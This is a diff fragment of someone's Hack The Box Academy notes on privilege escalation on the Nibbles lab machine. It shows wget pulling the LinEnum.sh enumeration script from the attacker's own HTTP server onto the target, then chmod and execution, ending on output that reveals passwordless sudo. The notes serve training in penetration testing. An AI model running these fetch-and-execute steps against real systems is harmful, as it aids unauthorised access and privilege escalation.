secmancer/sec-notes-repo/Hack The Box/HTB Academy/Skill Paths/Cracking into HTB/Getting Started/Attacking your First Box/Nibbles - Privilege Escalation.md

 Serving HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/) ...
 10.129.42.190 - - [17/Dec/2020 02:16:51] "GET /LinEnum.sh HTTP/1.1" 200 -
 ```
 - Back on the target type `wget http://<your ip>:8080/LinEnum.sh` to download the script.
-If successful, we will see a 200 success response on our Python HTTP server.
+- If successful, we will see a 200 success response on our Python HTTP server.
-- Once the script is pulled over, type `chmod +x LinEnum.sh` to make the script executable and then type `./LinEnum.sh` to run it.
+- Once the script is pulled over, type `chmod +x LinEnum.sh` to make the script executable.
+- Type `./LinEnum.sh` to run it.
 - We see a ton of interesting output but what immediately catches the eye are `sudo` privileges.
 ```shell-session
 [+] We can sudo without supplying a password!